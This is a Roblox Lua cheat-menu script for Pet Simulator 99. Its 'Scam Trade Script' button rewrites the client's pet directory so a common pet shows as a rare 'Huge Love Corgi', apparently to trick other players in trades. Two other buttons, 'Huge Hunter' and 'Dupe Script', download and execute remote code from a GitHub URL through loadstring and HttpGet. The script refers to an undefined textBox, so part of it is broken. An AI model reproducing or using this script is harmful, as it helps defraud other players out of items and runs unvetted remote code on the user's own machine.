local version, changelog = lib:GetInfo()
local window = lib:CreateWindow("Salesman_Hub  v1")
local label = lib:CreateLabel(window, "Pets Simulator 99")
local button = lib:CreateButton(window, "Scam Trade Script", function()
        local Pets = require(game:GetService("ReplicatedStorage").Library.Directory.Pets)

local fromPet = "Pink poodle"
    local toPet = "Huge Love Corgi"
    
    if Pets[fromPet] and Pets[toPet] then
        for i, v in pairs(Pets[fromPet]) do
            Pets[fromPet][i] = nil
        end
        for i, v in pairs(Pets[toPet]) do
            Pets[fromPet][i] = v
        end
    end
    print(textBox.Text)
end)

local button = lib:CreateButton(window, "Huge Hunter Script", function()
        loadstring(game:HttpGet("https://raw.githubusercontent.com/Samyb555/Pet-simulator-99-Huge-Hunter/refs/heads/main/Pet-simulator-99.txt"))()
    print(textBox.Text)
end)

local button = lib:CreateButton(window, "Dupe Script", function()
        loadstring(game:HttpGet("https://raw.githubusercontent.com/Samyb555/Pet-simulator-99-Huge-Hunter/refs/heads/main/Pet-simulator-99.txt"))()
    print(textBox.Text)
end)
